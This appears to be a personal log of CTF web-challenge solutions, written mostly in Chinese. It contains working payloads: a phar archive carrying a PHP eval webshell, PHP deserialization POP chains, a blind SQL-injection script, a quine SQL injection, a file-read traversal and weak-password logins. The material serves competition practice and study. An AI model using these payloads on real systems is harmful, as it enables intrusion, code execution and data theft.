[NISACTF 2022]bingdundun~
bingdundun处感觉像文件包含,改upload为index
发现确实,猜测会补一个后缀.php
那常规文件包含都不行了,这里还有一个文件上传的功能,考虑phar协议
<?php
$phar = new Phar("test.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();");
$phar->addFromString("test.php",'<?php eval($_GET[1]);?>');
$phar->stopBuffering();
生成的phar文件改后缀zip上传
[HDCTF 2023]Welcome To HDCTF 2023
死了也行直接给的
[NISACTF 2022]midlevel
Smarty ssti
感觉刚做过
[GKCTF 2020]cve版签到
[GXYCTF 2019]BabyUpload
.htaccess
常规的命令执行函数给ban了
用无参rce的方式读一下根目录的文件,看看flag叫什么
scandir(array_rand(array_flip(str_split(set_include_path(dirname(dirname(dirname(getcwd()))))))));
就叫flag,那直接读
[NSSCTF 2022 Spring Recruit]babyphp
[GDOUCTF 2023]EZ WEB
[NISACTF 2022]popchains
<?php
if(isset($_GET['wish'])){
@unserialize($_GET['wish']);
}
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){// 3
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {// 4
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var;
public function __construct($var){
$this -> var = $var;
}
public function append($value){// 0
include($value);
}
public function __invoke(){
$this->append($this->var);// 1
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){// 2
$function = $this->effort;
return $function();
}
}
$p = new Road_is_Long();
$R = new Road_is_Long();
$p -> page = $R;
$M = new Make_a_Change();
$R -> string = $M;
$T =new Try_Work_Hard('/flag');
$M -> effort = $T;
echo urlencode(serialize($p))."\n";
O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A9%3A%22index.php%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D
[CISCN 2019华北Day2]Web1
import requests
url = 'http://node2.anna.nssctf.cn:28640//index.php'
flag = ''
for i in range(1, 100):
s = 33
e = 130
mid = (e + s)>>1
while True:
payload = {
'id': 'if(ascii(substr((select(flag)from(flag)),{},1))>{},1,0)'.format(i, mid)
}
res = requests.post(url=url, data=payload).text
if 'Hello, glzjin wants a girlfriend.' in res:
s = mid
else:
e = mid
mid = (e + s)>>1
if (e-s) <= 1:
flag += chr(e)
print(flag)
break
if '}' in flag:
break
[NSSRound#1 Basic]basic_check
无从下手,看wp是说允许PUT可以直接写马
[HCTF 2018]Warmup
[HNCTF 2022 Week1]2048
[LitCTF 2023]Http pro max plus
[GDOUCTF 2023]泄露的伪装
[HNCTF 2022 Week1]Interesting_include
[第五空间 2021]pklovecloud
<?php
include 'flag.php';
class pkshow
{
function echo_name()
{
return "Pk very safe^.^";
}
}
class acp
{
protected $cinder;
public $neutron;
public $nova;
function __construct($p)
{
$this->cinder = $p;
}
function __toString()
{
if (isset($this->cinder))
return $this->cinder->echo_name();
}
}
class ace
{
public $filename;
public $openstack;
public $docker;
public function __construct(){
$this->filename = '../../../../../nssctfasdasdflag';
}
function echo_name()
{
$this->openstack = unserialize($this->docker);
$this->openstack->neutron = $heat;
if($this->openstack->neutron === $this->openstack->nova)
{
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "keystone lost~";
}
}
}
}
$ACE = new ace();
$pop = new acp($ACE);
echo urlencode(serialize($pop));
[鹤城杯 2021]Middle magic
[GKCTF 2021]easycms
弱口令 admin 12345
蝉知7.7网上找漏洞
然后尝试复现,我当时做的时候可以执行whoami,当时没做完干别的去了,过几天回来做又不能复现rce的漏洞了
那就和别人wp里写的一样任意文件下载
?m=ui&f=downloadtheme&theme=L2ZsYWc=
[SWPUCTF 2022 新生赛]ez_rce
getshell
直接读flag读不到
搜一下flag
find / -name "flag"
find / -name "flag" -type f -exec cat {} \;
[羊城杯 2020]easycon
base64解码得到flag
[LitCTF 2023]这是什么?SQL !注一下 !
-1))))))union select 1,group_concat(flag)from ctftraining.flag%23
[第五空间 2021]yet_another_mysql_injection
admin admin 爆hacker
然后我在这手工测了一会 没什么思路
右键看源码
然后跟进/?source
意思是传的password和查询的password要相同 quine注入
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
看wp发现第二种做法
phpmyadmin
弱口令 admin admin
登录就行了